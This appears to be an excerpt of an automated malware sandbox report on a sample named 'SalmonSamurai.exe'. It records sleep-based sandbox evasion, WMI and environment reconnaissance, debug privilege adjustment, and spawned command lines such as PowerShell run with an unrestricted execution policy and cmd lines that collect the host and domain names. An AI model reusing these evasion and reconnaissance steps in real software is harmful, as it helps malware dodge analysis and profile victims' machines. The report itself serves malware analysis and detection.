Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4124Thread sleep count: 1422 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep count: 6735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep count: 2876 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 1530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 1088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884Thread sleep count: 1459 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 1450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 1737 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep count: 930 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtractedJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asarJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resourcesJump to behavior
Source: SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: VMware can crash with older drivers and WebGL content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Users VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
